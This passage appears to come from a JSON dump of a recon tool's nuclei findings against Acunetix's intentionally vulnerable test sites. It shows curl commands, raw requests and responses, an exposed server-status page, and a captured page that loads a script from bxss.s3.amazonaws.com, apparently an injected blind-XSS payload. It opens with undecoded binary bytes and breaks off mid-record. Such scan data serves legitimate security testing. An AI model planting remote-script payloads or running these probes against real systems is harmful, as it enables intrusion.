�yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 299, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:35:05.147Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:63.0) Gecko/20100101 Firefox/63.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:35:04 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 300, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.20348' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:35:07.031Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.20348\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:35:06 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 301, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/apache/apache-server-status.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/apache-server-status", + "template_id": "apache-server-status", + "matcher_name": "", + "name": "Apache Server Status Disclosure", + "severity": 1, + "description": "Apache /server-status displays information about your Apache status. If you are not using this feature, disable it.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://www.exploit-db.com/ghdb/5548', 'https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-status-detected/', 'https://www.acunetix.com/vulnerabilities/web/apache-server-status-detected/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/11605.3.8.1' 'http://testphp.vulnweb.com/cgi-bin/server-status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/server-status", + "discovered_date": "2024-11-13T02:36:34.445Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/server-status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.2 Safari/11605.3.8.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nDate: Wed, 13 Nov 2024 02:36:34 GMT\r\nServer: nginx/1.19.0\r\nVary: Accept-Encoding\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<html><head>\n<title>Apache Status</title>\n</head><body>\n<h1>Apache Server Status for localhost (via 127.0.0.1)</h1>\n\n<dl><dt>Server Version: Apache/2.4.46 (Ubuntu)</dt>\n<dt>Server MPM: prefork</dt>\n<dt>Server Built: 2020-08-10T12:32:13\n</dt></dl><hr /><dl>\n<dt>Current Time: Wednesday, 13-Nov-2024 02:36:34 UTC</dt>\n<dt>Restart Time: Wednesday, 13-Nov-2024 02:32:15 UTC</dt>\n<dt>Parent Server Config. Generation: 1</dt>\n<dt>Parent Server MPM Generation: 0</dt>\n<dt>Server uptime: 4 minutes 18 seconds</dt>\n<dt>Server load: 0.91 0.44 0.22</dt>\n<dt>Total accesses: 3477 - Total Traffic: 2.7 MB - Total Duration: 836</dt>\n<dt>CPU Usage: u.53 s.26 cu0 cs0 - .306% CPU load</dt>\n<dt>13.5 requests/sec - 10.7 kB/second - 816 B/request - .240437 ms/request</dt>\n<dt>2 requests currently being processed, 3 idle workers</dt>\n</dl><pre>__W_C...........................................................\n................................................................\n......................</pre>\n<p>Scoreboard Key:<br />\n"<b><code>_</code></b>" Waiting for Connection, \n"<b><code>S</code></b>" Starting up, \n"<b><code>R</code></b>" Reading Request,<br />\n"<b><code>W</code></b>" Sending Reply, \n"<b><code>K</code></b>" Keepalive (read), \n"<b><code>D</code></b>" DNS Lookup,<br />\n"<b><code>C</code></b>" Closing connection, \n"<b><code>L</code></b>" Logging, \n"<b><code>G</code></b>" Gracefully finishing,<br /> \n"<b><code>I</code></b>" Idle cleanup of worker, \n"<b><code>.</code></b>" Open slot with no current process<br />\n</p>\n\n\n<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU\n</th><th>SS</th><th>Req</th><th>Dur</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>Protocol</th><th>VHost</th><th>Request</th></tr>\n\n<tr><td><b>0-0</b></td><td>3056288</td><td>0/695/695</td><td>_\n</td><td>0.15</td><td>0</td><td>0</td><td>162</td><td>0.0</td><td>0.54</td><td>0.54\n</td><td>127.0.0.1</td><td>http/1.1</td><td nowrap>2600:1f14:a72:b00:183a:bb44:f69</td><td nowrap>GET //etc.children.json?FNZ.css HTTP/1.0</td></tr>\n\n<tr><td><b>1-0</b></td><td>3056289</td><td>0/696/696</td><td>_\n</td><td>0.15</td><td>0</td><td>0</td><td>175</td><td>0.0</td><td>0.54</td><td>0.54\n</td><td>127.0.0.1</td><td>http/1.1</td><td nowrap>2600:1f14:a72:b00:183a:bb44:f69</td><td nowrap>GET //1/etc.children.json/FNZ.png HTTP/1.0</td></tr>\n\n<tr><td><b>2-0</b></td><td>3056290</td><td>0/698/698</td><td><b>W</b>\n</td><td>0.16</td><td>0</td><td>0</td><td>181</td><td>0.0</td><td>0.54</td><td>0.54\n</td><td>127.0.0.1</td><td>http/1.1</td><td nowrap>2600:1f14:a72:b00:183a:bb44:f69</td><td nowrap>GET //server-status HTTP/1.0</td></tr>\n\n<tr><td><b>3-0</b></td><td>3056291</td><td>0/692/692</td><td>_\n</td><td>0.15</td><td>0</td><td>0</td><td>157</td><td>0.0</td><td>0.54</td><td>0.54\n</td><td>127.0.0.1</td><td>http/1.1</td><td nowrap>2600:1f14:a72:b00:183a:bb44:f69</td><td nowrap>GET //1/etc.children.json?FNZ.css HTTP/1.0</td></tr>\n\n<tr><td><b>4-0</b></td><td>3056292</td><td>0/696/696</td><td>_\n</td><td>0.15</td><td>0</td><td>0</td><td>160</td><td>0.0</td><td>0.54</td><td>0.54\n</td><td>127.0.0.1</td><td>http/1.1</td><td nowrap>2600:1f14:a72:b00:183a:bb44:f69</td><td nowrap>GET //etc.children....4.2.1....json HTTP/1.0</td></tr>\n\n</table>\n <hr /> <table>\n <tr><th>Srv</th><td>Child Server number - generation</td></tr>\n <tr><th>PID</th><td>OS process ID</td></tr>\n <tr><th>Acc</th><td>Number of accesses this connection / this child / this slot</td></tr>\n <tr><th>M</th><td>Mode of operation</td></tr>\n<tr><th>CPU</th><td>CPU usage, number of seconds</td></tr>\n<tr><th>SS</th><td>Seconds since beginning of most recent request</td></tr>\n <tr><th>Req</th><td>Milliseconds required to process most recent request</td></tr>\n <tr><th>Dur</th><td>Sum of milliseconds required to process all requests</td></tr>\n <tr><th>Conn</th><td>Kilobytes transferred this connection</td></tr>\n <tr><th>Child</th><td>Megabytes transferred this child</td></tr>\n <tr><th>Slot</th><td>Total megabytes transferred this slot</td></tr>\n </table>\n<hr />\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 13, + 14, + 15 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 302, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/form-detection.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/form-detection", + "template_id": "form-detection", + "matcher_name": "", + "name": "Form Detection", + "severity": 0, + "description": "A template to detect HTML Forms in page response.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/dirtycoder0124/formcrawler']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:38:18.530Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.4\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:38:18 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 16, + 17, + 18 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 303, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/form-detection.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/form-detection", + "template_id": "form-detection", + "matcher_name": "", + "name": "Form Detection", + "severity": 0, + "description": "A template to detect HTML Forms in page response.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/dirtycoder0124/formcrawler']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 XTPT/1.0' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:38:18.916Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:38:18 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script 